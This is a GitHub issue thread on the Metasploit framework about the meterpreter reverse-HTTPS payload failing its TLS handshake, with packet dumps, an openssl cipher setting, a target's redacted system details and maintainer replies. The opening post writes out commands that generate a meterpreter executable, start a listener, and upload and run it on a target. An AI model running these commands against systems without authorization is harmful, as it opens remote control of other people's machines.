### ISSUE TITLE
reverse_https does not work: Handshake failed

### ISSUE THREAD

**Issue by friedrico** [rapid7/metasploit-framework#14960]
```
use multi/handler
set payload windows/meterpreter_reverse_https
set lport 8888
run -j

msfvenom -p windows/meterpreter_reverse_https LPORT=8888  -f exe -o meterpreter.exe

sessions -1
upload meterpreter.exe
execute -f meterpreter.exe
```

```
Transport Layer Security
    TLSv1 Record Layer: Handshake Protocol: Client Hello
        Content Type: Handshake (22)
        Version: TLS 1.0 (0x0301)
        Length: 65
        Handshake Protocol: Client Hello
            Handshake Type: Client Hello (1)
            Length: 61
            Version: TLS 1.0 (0x0301)
            Random: 6060a1aace08c13802e62a0eed2d5899e6ff386334a9d44aca5bf1716a92d759
            Session ID Length: 0
            Cipher Suites Length: 22
            Cipher Suites (11 suites)
                Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004)
                Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005)
                Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a)
                Cipher Suite: TLS_RSA_WITH_DES_CBC_SHA (0x0009)
                Cipher Suite: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA (0x0064)
                Cipher Suite: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA (0x0062)
                Cipher Suite: TLS_RSA_EXPORT_WITH_RC4_40_MD5 (0x0003)
                Cipher Suite: TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 (0x0006)
                Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013)
                Cipher Suite: TLS_DHE_DSS_WITH_DES_CBC_SHA (0x0012)
                Cipher Suite: TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA (0x0063)
            Compression Methods Length: 1
            Compression Methods (1 method)
                Compression Method: null (0)
```

```
Transport Layer Security
    TLSv1 Record Layer: Alert (Level: Fatal, Description: Handshake Failure)
        Content Type: Alert (21)
        Version: TLS 1.0 (0x0301)
        Length: 2
        Alert Message
            Level: Fatal (2)
            Description: Handshake Failure (40)
```

openssl.cnf
```
[system_default_sect]
MinProtocol = None
CipherString = ALL
```

How to make https connections reliably working?
What is the supposed way to use https to legacy windows systems that do not speak TLS?

**Comment by friedrico** [comment]
For me the issue is still open
Any chance to get help or provide more details?

**Comment by adfoster-r7** [comment]
@friedrico More information to replicate this would be great, specifically the target's systeminfo etc.
As a workaround, I assume the reverse http payload worked?

**Comment by captain-woof** [comment]
Same is happening with me as well.

**Comment by adfoster-r7** [comment]
@captain-woof Providing more information to replicate this issue would be great, specifically the target's systeminfo etc.
Is it possible to use the reverse http payload as a workaround?

**Comment by bcoles** [comment]
This is issue is likely related to #15435

**Comment by captain-woof** [comment]
> Providing more information to replicate this issue would be great, specifically the target's systeminfo etc.
Is it possible to use the reverse http payload as a workaround?
Here's the target's systeminfo:
```
    Hostname: REDACTED 
    Domain Name: REDACTED.local 
    ProductName: Windows Server 2019 Standard
    EditionID: ServerStandard
    ReleaseId: 1809
    BuildBranch: rs5_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
    Architecture: AMD64
    ProcessorCount: 4
    SystemLang: en-US
    KeyboardLang: English (United Kingdom)
    TimeZone: (REDACTED) REDACTED
    IsVirtualMachine: True
    Current Time: 20/07/2021 06:05:45
    HighIntegrity: False
    PartOfDomain: True
    Hotfixes: 
```
And yes, I can use the reverse http payload, it is only with https that it doesn't work.

**Comment by adfoster-r7** [comment]
I believe this might be resolved now as #15435 was fixed
